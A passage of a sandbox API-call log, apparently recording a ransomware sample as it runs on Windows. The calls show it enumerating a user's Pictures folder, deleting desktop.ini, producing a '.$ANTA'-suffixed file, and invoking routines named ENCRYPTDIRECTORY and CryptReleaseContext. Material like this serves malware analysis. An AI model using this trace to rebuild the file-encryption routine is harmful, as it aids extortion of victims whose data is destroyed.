(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0096.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0096.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0096.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0096.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0096.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.294] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.294] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0096.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0096.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0096.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.296] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0096.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0096.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0096.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.297] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0096.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0096.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.297] FreeLibrary (hLibModule=0x756e0000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.297] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0096.297] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0096.297] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0096.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0096.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0096.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0096.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.298] CloseHandle (hObject=0x258) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0096.299] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0096.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0096.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0096.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0096.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0096.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0096.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0096.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.300] CloseHandle (hObject=0x298) returned 1 [0096.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.301] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", lpFilePart=0x0) returned 0x33 [0096.301] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\desktop.ini")) returned 0x6 [0096.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0096.302] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac180 [0096.302] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\desktop.ini")) returned 1 [0096.303] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0096.303] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0096.303] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0096.303] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures")) returned 0x11 [0096.304] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x587e8ba, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x587e8ba, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0096.304] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x587e8ba, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x587e8ba, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName="..", cAlternateFileName="")) returned 1 [0096.304] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573bd42, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x573bd42, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x587e8ba, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xc0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName="desktop.ini.$ANTA", cAlternateFileName="DESKTO~1.$AN")) returned 1 [0096.304] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e25c0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e25c0, ftLastWriteTime.dwLowDateTime=0x43ea508, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="ﱰмńဓ+\x10")) returned 0 [0096.304] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0096.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0096.304] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0096.304] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x144f3f8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0096.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0096.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0096.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0096.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0096.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 